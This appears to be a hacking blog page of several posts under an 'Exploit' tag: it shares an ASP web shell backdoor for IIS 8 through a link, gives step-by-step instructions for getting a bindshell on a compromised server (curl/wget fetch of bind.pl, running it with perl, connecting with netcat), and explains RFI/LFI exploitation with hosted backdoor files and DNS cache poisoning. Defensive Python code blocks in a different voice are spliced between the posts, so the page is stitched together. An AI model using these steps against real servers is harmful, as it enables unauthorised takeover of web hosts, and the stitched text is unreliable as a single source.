Articles by "Exploit"



Okay, this time we have another update. This time I will share an ASP shell backdoor. This shell is different from the usual ones because it is specifically for Windows Server 2012, more precisely for IIS 8. Sometimes we find a website where a file upload succeeds, but when we open the file we get 404 Not Found, and the page is the IIS 8 404 page. That is because a website running on an IIS server does not accept arbitrary file extensions; it is rare for the .php extension to be enabled because it is prone to attack. That is why this shell is needed: it is designed specifically for Windows Server.

So what is the difference between an ASP shell and a PHP one? Let's have a short discussion so things aren't so stiff :v

ASP stands for Active Server Pages, a type of program that runs on Microsoft (Windows) through IIS (Internet Information Server). ASP requires a Microsoft server to run a website. PHP (Hypertext Preprocessor) programs, on the other hand, run on Linux or Unix servers. Newer PHP versions can also run on NT servers.


PHP programs can also run on Windows, Solaris, Unix and Linux, whereas ASP can only run on servers with the Windows platform. Only recently has ASP been able to run on the Linux platform, and only when ASP-Apache is installed on the server.

PHP is very flexible when connecting to databases. PHP can connect to several databases, of which MySQL is the most widely used. Note that MySQL will not cost you a single rupiah. But if you want to use ASP, you need to buy MS-SQL, a Microsoft product.

Load speed is a big factor in maintaining a website. If you are very particular about speed, you probably need PHP. Basically PHP code runs faster than ASP because it runs in its own space, whereas ASP uses an additional server and a COM-based architecture.

When working with PHP, most of the tools associated with the program are open source software, so you don't need to pay to get them. This is unlike ASP, which may require us to buy additional tools to work with the program.

In conclusion, both PHP and ASP have advantages and disadvantages. Basically it all depends on which side of website development you choose. Are you worried about the cost of building your website? Do you want to use a programming language you are familiar with? Do you want a more stable and faster website? The choice between ASP and PHP basically depends on your own preference. You should consult other programmers or webmasters and gather as much information as possible about which programming language fits your website best.
That's probably enough about ASP :v

Okay, straight to it. Here is what the shell looks like:




Source:
https://pastebin.com/iuJhCm8Y

Hope it's useful

(Zaenal Arifin)

Okay, this time I will give a simple tutorial on how to backconnect using a bindshell. Many problems are often encountered when going to root a server at step 1, namely the backconnect. There may be many ways to backconnect, but this time I will give a tutorial using a bindshell.


Materials:
Bindshell script: Here
Shell backdoor / webconsole shell: Here
netcat [if you use Windows]: Here

Proof of Concept:
Step 1:
Upload the bindshell file. If the web server does not accept the upload through the browser uploader, you can try using a command.

Upload commands:
Using curl: curl -o bind.pl [scriptlink]
Using wget: wget [scriptlink] -O bind.pl

Step 2:
Once the file is uploaded, go to cmd/Terminal [netcat folder].

Using the command:
Windows user: cd C:/[PathNetcat]/
Linux user: run it directly

Step 3:
Command: nc -vv [ServerIP] [Port]
Once typed, do not press Enter yet;
go to the shell backdoor/webconsole.

Step 4:
In the web console run
perl bind.pl 1337
and press Enter.

Notes: bind.pl => bindshell file name, 1337 => port

Step 5:
Go back to cmd/Terminal
and press Enter,

and see what happens.
Backconnect success :p

PoC Video:



Notes: This trick does not work 100% on all servers. The important thing to check is PERL, i.e. whether it is ON or OFF on the web server.
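As a defender-side counterpart to the steps above, here is an added example (not part of the original post) of the check a server administrator runs when a listener like the one in step 4 is suspected: it parses the output of `ss -tlnp` and flags listening sockets owned by interpreter processes such as perl, or sitting on ports outside the host's expected service set. The `ss` output below is constructed for the example, and the expected-port set is an assumption to be replaced by the host's own baseline.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -tlnp` output (not captured from a real host).
# The last line models an interpreter holding a listening socket on port 1337.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       128      0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511      0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=1201,fd=6),("nginx",pid=1202,fd=6))
LISTEN  0       128      127.0.0.1:3306       0.0.0.0:*          users:(("mysqld",pid=955,fd=21))
LISTEN  0       5        0.0.0.0:1337         0.0.0.0:*          users:(("perl",pid=4410,fd=3))
"""

# Process names that normally have no business owning a listening socket on a web host.
INTERPRETERS = {"perl", "python", "python3", "php", "sh", "bash", "nc", "ncat"}

# Matches one ("name",pid=N,fd=N) entry inside the Process column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


@dataclass(frozen=True)
class Listener:
    port: int
    addr: str
    process: str
    pid: int


def parse_ss(output):
    """Turn `ss -tlnp` text into Listener records, one per owning process."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        # Skip the header and anything that is not a listening socket.
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        for name, pid in PROC_RE.findall(fields[5]):
            listeners.append(Listener(int(port), addr, name, int(pid)))
    return listeners


def find_suspicious(output, expected_ports, interpreters=INTERPRETERS):
    """Flag listeners owned by an interpreter or bound to an unexpected port."""
    return [
        lst for lst in parse_ss(output)
        if lst.process in interpreters or lst.port not in expected_ports
    ]


if __name__ == "__main__":
    # Assumed baseline for this host: ssh, the web server and the local database.
    for hit in find_suspicious(SAMPLE_SS_OUTPUT, {22, 80, 3306}):
        print(f"suspicious listener: {hit.process} (pid {hit.pid}) on {hit.addr}:{hit.port}")
```

Run against live output with `ss -tlnp | python3 check_listeners.py` after replacing the sample string with `sys.stdin.read()`; the port baseline should come from the host's service inventory, not from what is currently listening.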

(Zaenal Arifin)

Remote File Inclusion (RFI)



Hello Guys! In this article we will learn how an RFI vulnerability is exploited. I hope you have read my previous article on Local File Inclusion; if you haven't, please go and read that first.



Remote File Inclusion (RFI)

As the name states, if the attacker can include a remote file in the victim web app, it is called a Remote File Inclusion (RFI) vulnerability. Take a look at this piece of code:






As you can see, the first line extracts the file parameter value from the HTTP request made by the user, while the second line uses this value to set the file name. If the input is not sanitized properly it can be used to include a malicious file from a remote server. Here's vulnerable JSP code:





Again, if the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all, but it is very dangerous when exploited. Now you must be wondering how this vulnerability is exploited. Hold on, I will demonstrate it with a real-life example. We have a URL here:





Let's break things down:



  1. www.victim.com is the target website
  2. file.php is a webpage with the parameter view=
  3. For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view=. If it were including local files like view=/files/animals.php we would have tested for Local File Inclusion. But as we can see it is including files from docs.example.com, which is a different website; it loads files from another site, which means it may include a malicious file too. Enough theory! So here's the vulnerable parameter:


Now I will try to load an image by submitting its URL like this:





See? How easy is that? With a webshell you can take over their website or even the whole server.


Local File Inclusion (LFI) and Remote File Inclusion (RFI)




Today’s article is about Local File Inclusion (LFI) and Remote File Inclusion (RFI).
If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.
We take advantage of vulnerable parameters in LFI and RFI too.

In SQL injection, we interact with the SQL database using SQL queries to retrieve sensitive data from the database. But in LFI/RFI we ask the webpage to open something for us, it could be a file or a webpage (a webpage is a file too) from another website.
Enough theory! Now lets see what the heck are LFI and RFI.

Local File Inclusion (LFI)

Take a look at this URL:






The parameter in this case is view= and the value is /images/Haxor.jpg.
It means open.php is a webpage which loads different files (Haxor.jpg in this case) from the server. There can be many sensitive files on the server which can be accessed through open.php if the webpage is vulnerable to LFI.

You can open/execute any type of file (not folders) with LFI, which means you can read logs and configuration files and execute files if a webpage is vulnerable to Local File Inclusion. You can even hack into the server if the server admin is careless enough not to configure things properly.


Remote File Inclusion (RFI)


What is the difference between Local File Inclusion and Remote File Inclusion?
Well, both vulnerabilities can be used to open things, but LFI is used to open files from the server where the website is hosted (locally) while RFI is used to open files from another server (remotely).
We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.

Take a look at this URL:




By looking at the above URL one would guess that the parameter page= loads webpages.
It is opening the home page; similarly it may open other pages from the website. But if the webpage (get.php) is not programmed properly, then a hacker can replace home with a webpage of his choosing, like






If everything goes well then get.php will try to open backdoor.php, which will compromise the server (or do something else, depending on what's in it). That makes RFI a deadly vulnerability.
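Both file-inclusion write-ups above (the RFI article and this LFI/RFI article) describe the same root cause: a request parameter such as view= or page= is handed straight to an include. The following added example (not code from the original posts) shows the two server-side fixes a developer applies, written in Python so it runs stand-alone: an allow-list that maps an opaque key such as home to a file, so raw paths never reach the include, and, for legacy callers that must send a filename, a resolver that rejects URLs and stream wrappers, NUL bytes, path traversal out of the include directory, and non-page extensions. The directory /var/www/app/pages and the page table are assumptions for the example.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed location of the includable pages and the only extension they may have.
BASE_DIR = "/var/www/app/pages"
ALLOWED_SUFFIXES = (".php",)

# Assumed allow-list: opaque request keys on the left, real files on the right.
PAGES = {
    "home": "home.php",
    "animals": "files/animals.php",
    "contact": "contact.php",
}


class IncludeRejected(ValueError):
    """Raised when a user-supplied include target fails validation."""


def _reject_remote_or_wrapper(value):
    """Refuse anything with a scheme (http://, php://, data:) or a network path."""
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or value.startswith(("//", "\\\\")):
        raise IncludeRejected("remote URLs and stream wrappers are not allowed")
    if "\x00" in value:
        raise IncludeRejected("NUL byte in include target")


def resolve_by_key(value, pages=PAGES, base_dir=BASE_DIR):
    """Preferred fix: the client sends a key, the server picks the file."""
    _reject_remote_or_wrapper(value)
    try:
        return posixpath.join(base_dir, pages[value])
    except KeyError:
        raise IncludeRejected(f"unknown page key {value!r}") from None


def resolve_by_path(value, base_dir=BASE_DIR, suffixes=ALLOWED_SUFFIXES):
    """Fallback when legacy clients send filenames: confine the path to base_dir."""
    _reject_remote_or_wrapper(value)
    # Treat the value as relative to base_dir, then collapse any ../ segments
    # and confirm the result is still inside the directory.
    candidate = posixpath.normpath(posixpath.join(base_dir, value.lstrip("/")))
    if not candidate.startswith(base_dir.rstrip("/") + "/"):
        raise IncludeRejected("path escapes the include directory")
    if not candidate.endswith(suffixes):
        raise IncludeRejected("only page files may be included")
    return candidate


if __name__ == "__main__":
    # Values modelled on the URLs discussed in the articles, plus classic abuse cases.
    samples = [
        "home",
        "/files/animals.php",
        "http://docs.example.com/backdoor.php",
        "../../etc/passwd",
        "php://input",
        "config.php\x00.jpg",
    ]
    for sample in samples:
        for resolver in (resolve_by_key, resolve_by_path):
            try:
                print(f"{resolver.__name__}({sample!r}) -> {resolver(sample)}")
            except IncludeRejected as exc:
                print(f"{resolver.__name__}({sample!r}) rejected: {exc}")
```

Disabling remote includes in the interpreter (for PHP, allow_url_include=Off) belongs alongside this code rather than instead of it: the path checks are what stop local traversal, which the interpreter setting does not cover.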

Okay, a little introduction first: what is DNS poisoning?
DNS spoofing, commonly referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System (DNS) data is inserted into the DNS resolver's cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker's computer (or another computer).

Overview of the domain name system

A Domain Name System server translates human-readable domain names (such as suicide-db.com) into the numeric IP addresses used to route communication between nodes. Usually, if the server does not know the requested translation, it will ask another server, and the process continues recursively. To improve performance, the server will typically remember (cache) this translation for a certain period of time. This means that if it receives another request for the same translation, it can reply without needing to ask another server, until the cache expires.


When a DNS server receives a false translation and caches it for performance optimization, it is considered poisoned, and it supplies the false data to clients. If a DNS server is poisoned, it may return an incorrect IP address, diverting traffic to another computer (often the attacker's).

Cache poisoning attacks

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server, or those serviced indirectly by its downstream server(s), if any.

To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.


This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.

Variants

In the following variants, the entries for the server ns.suicide-db.com would be poisoned and redirected to the attacker's name server at IP address 127.0.0.1. These attacks assume that the name server for suicide-db.com is ns.suicide-db.com.

To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.

Redirect the target domain's name server

The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the additional A record (IP address) for ns.target.example, allowing the attacker to resolve queries for the entire suicide-db.com domain.

Redirect the NS record to another target domain

The second variant of DNS cache poisoning involves redirecting the name server of another domain, unrelated to the original request, to an IP address specified by the attacker.


DNS server's request: what are the address records for subdomain.attacker.com?

















A vulnerable server would cache the unrelated authority information for target.example's NS record (name server entry), allowing the attacker to resolve queries for the entire suicide-db.com domain.
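Both variants above depend on the resolver accepting records that lie outside the zone it actually asked about. The following added example (not from the original article) models the bailiwick check a caching resolver applies to a reply: records returned by attacker.com's name server are kept only if their owner names fall inside attacker.com, so the extra A record for ns.suicide-db.com (variant 1) and the NS record for suicide-db.com (variant 2) are dropped while the legitimate glue for ns.attacker.com survives. The reply is constructed for the example and deliberately simplified (no DNSSEC validation and no ranking of data by trustworthiness); the 192.0.2.x addresses are documentation addresses, and 127.0.0.1 is the value the article itself uses for the attacker's server.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    """One resource record from a DNS reply (constructed fields, not wire format)."""
    section: str   # "answer", "authority" or "additional"
    name: str      # owner name of the record
    rtype: str     # record type such as "A" or "NS"
    data: str      # record data (address or target name)


def in_bailiwick(name, zone):
    """True if `name` is `zone` itself or lies beneath it (case- and dot-insensitive)."""
    name = name.rstrip(".").lower()
    zone = zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)


def filter_reply(records, bailiwick):
    """Split a reply into records the resolver may cache and records it must discard.

    The bailiwick is the zone the queried server is authoritative for; a record
    whose owner name is outside it cannot be trusted from this source, whatever
    section it arrived in.
    """
    kept, dropped = [], []
    for rr in records:
        (kept if in_bailiwick(rr.name, bailiwick) else dropped).append(rr)
    return kept, dropped


# Constructed reply to "what are the address records for subdomain.attacker.com?",
# as returned by attacker.com's name server with both poisoning variants attached.
POISONED_REPLY = [
    RR("answer",     "subdomain.attacker.com", "A",  "192.0.2.10"),
    RR("authority",  "suicide-db.com",         "NS", "ns.attacker.com"),  # variant 2
    RR("additional", "ns.suicide-db.com",      "A",  "127.0.0.1"),        # variant 1
    RR("additional", "ns.attacker.com",        "A",  "192.0.2.53"),       # legitimate glue
]


if __name__ == "__main__":
    kept, dropped = filter_reply(POISONED_REPLY, "attacker.com")
    for rr in kept:
        print(f"cached   {rr.section:<10} {rr.name} {rr.rtype} {rr.data}")
    for rr in dropped:
        print(f"dropped  {rr.section:<10} {rr.name} {rr.rtype} {rr.data} (out of bailiwick)")
```

The suffix test uses "." + zone so that a name like evilattacker.com is not mistaken for part of attacker.com; real resolvers add DNSSEC validation and per-record credibility rules on top of this check, as the article notes.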

Zaenal Arifin
